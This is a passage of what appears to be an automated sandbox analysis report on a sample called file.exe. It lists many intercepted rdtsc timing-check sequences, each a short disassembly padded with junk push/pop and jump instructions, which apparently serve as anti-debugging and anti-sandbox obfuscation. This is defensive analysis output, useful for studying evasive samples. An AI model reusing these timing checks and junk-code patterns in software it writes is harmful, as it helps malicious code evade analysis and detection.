              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 789D59 second address: 789DBC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnp 00007F3874C2D1D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jo 00007F3874C2D1D6h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 pop eax 0x00000017 jmp 00007F3874C2D1E3h 0x0000001c popad 0x0000001d popad 0x0000001e push esi 0x0000001f pushad 0x00000020 je 00007F3874C2D1D6h 0x00000026 jl 00007F3874C2D1D6h 0x0000002c jmp 00007F3874C2D1DBh 0x00000031 popad 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 jmp 00007F3874C2D1E9h 0x0000003b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 789613 second address: 789630 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F38751214B7h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 789630 second address: 789634 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 789634 second address: 789640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 789640 second address: 789646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78976B second address: 78976F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7915F3 second address: 79160C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3874C2D1E5h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79160C second address: 791610 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78FFDA second address: 790005 instructions: 0x00000000 rdtsc 0x00000002 je 00007F3874C2D1D6h 0x00000008 jne 00007F3874C2D1D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F3874C2D1E5h 0x00000015 popad 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790005 second address: 790009 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790261 second address: 790267 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7903BA second address: 7903BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79050A second address: 79053B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F3874C2D1DAh 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F3874C2D1E5h 0x00000015 jns 00007F3874C2D1D6h 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79053B second address: 790540 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7906C0 second address: 7906C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7906C6 second address: 7906CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7906CA second address: 7906CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7906CE second address: 7906D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7906D4 second address: 7906DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7906DE second address: 7906E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7906E2 second address: 7906EC instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3874C2D1D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7906EC second address: 7906FB instructions: 0x00000000 rdtsc 0x00000002 jg 00007F38751214AAh 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7906FB second address: 790701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73E5F8 second address: 73E5FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73E5FC second address: 73E600 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73E600 second address: 73E606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79099C second address: 7909CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007F3874C2D1DBh 0x00000012 jmp 00007F3874C2D1DBh 0x00000017 popad 0x00000018 jnl 00007F3874C2D1DCh 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7912BE second address: 7912E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jno 00007F38751214A6h 0x0000000c popad 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F38751214B5h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7912E5 second address: 7912EF instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3874C2D1D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7912EF second address: 791308 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F38751214B4h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795176 second address: 7951A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F3874C2D1E4h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3874C2D1E7h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7951A8 second address: 7951BF instructions: 0x00000000 rdtsc 0x00000002 js 00007F38751214A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F38751214AAh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7951BF second address: 7951CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3874C2D1DAh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7951CE second address: 7951DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F38751214A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 794818 second address: 794827 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F3874C2D1D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 794BDF second address: 794BFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F38751214AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007F38751214AEh 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 797F70 second address: 797F75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79781A second address: 797820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 797C5F second address: 797C63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79D946 second address: 79D960 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F38751214A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F38751214ADh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79DC76 second address: 79DC7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79E4DD second address: 79E4E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79E7B3 second address: 79E7C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3874C2D1DCh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79EA8B second address: 79EA91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79EA91 second address: 79EA9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push edx 0x00000007 pop edx 0x00000008 pop esi 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79EA9A second address: 79EAA6 instructions: 0x00000000 rdtsc 0x00000002 js 00007F38751214AEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79EDBC second address: 79EDC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79EDC0 second address: 79EDC6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79F5C9 second address: 79F5E2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3874C2D1D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F3874C2D1DBh 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A8DC3 second address: 7A8DDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F38751214A6h 0x00000009 jne 00007F38751214A6h 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A8DDE second address: 7A8DF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F3874C2D1E2h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A8F50 second address: 7A8F57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A8F57 second address: 7A8F6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F3874C2D1DFh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A8F6C second address: 7A8F70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A9277 second address: 7A927B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A93AF second address: 7A93B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A93B6 second address: 7A93BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A94FF second address: 7A953D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F38751214B6h 0x0000000b push ecx 0x0000000c jns 00007F38751214A6h 0x00000012 pushad 0x00000013 popad 0x00000014 pop ecx 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F38751214B5h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A953D second address: 7A9543 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A9543 second address: 7A9547 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A9547 second address: 7A954D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A96DE second address: 7A96FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F38751214B8h 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A96FB second address: 7A9709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A99F7 second address: 7A9A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F38751214AAh 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A9A0C second address: 7A9A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A9A12 second address: 7A9A16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A9A16 second address: 7A9A2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3874C2D1E0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A9A2A second address: 7A9A34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A9A34 second address: 7A9A3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A9A3A second address: 7A9A3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A9A3E second address: 7A9A44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B2B5B second address: 7B2B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B2B5F second address: 7B2B7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F3874C2D1E5h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B111D second address: 7B1122 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1122 second address: 7B112C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B154C second address: 7B1581 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F38751214AAh 0x00000008 jns 00007F38751214B7h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 jmp 00007F38751214AAh 0x00000018 pushad 0x00000019 popad 0x0000001a pop esi 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1581 second address: 7B158F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3874C2D1D8h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B158F second address: 7B15AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F38751214B7h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B15AA second address: 7B15B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B16E8 second address: 7B16F3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B16F3 second address: 7B170A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3874C2D1DFh 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B184E second address: 7B1853 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1853 second address: 7B1871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 jmp 00007F3874C2D1E6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1B43 second address: 7B1B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1B48 second address: 7B1B4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B22F0 second address: 7B22F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B22F4 second address: 7B231C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F3874C2D1DFh 0x0000000c jmp 00007F3874C2D1E1h 0x00000011 pop eax 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B231C second address: 7B2328 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F38751214A6h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B2A0B second address: 7B2A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7C1A second address: 7B7C20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7C20 second address: 7B7C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7C26 second address: 7B7C2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7C2E second address: 7B7C34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7C34 second address: 7B7C53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F38751214AFh 0x0000000d jc 00007F38751214A6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7E01 second address: 7B7E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F3874C2D1D6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7F48 second address: 7B7F4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C686D second address: 7C6885 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007F3874C2D1DCh 0x00000010 pop edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6885 second address: 7C688A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2C17 second address: 7D2C49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3874C2D1DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F3874C2D1DBh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F3874C2D1E0h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2C49 second address: 7D2C4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2C4F second address: 7D2C59 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3874C2D1D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2C59 second address: 7D2C8B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pushad 0x00000007 jmp 00007F38751214B6h 0x0000000c jmp 00007F38751214B3h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D64F9 second address: 7D64FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
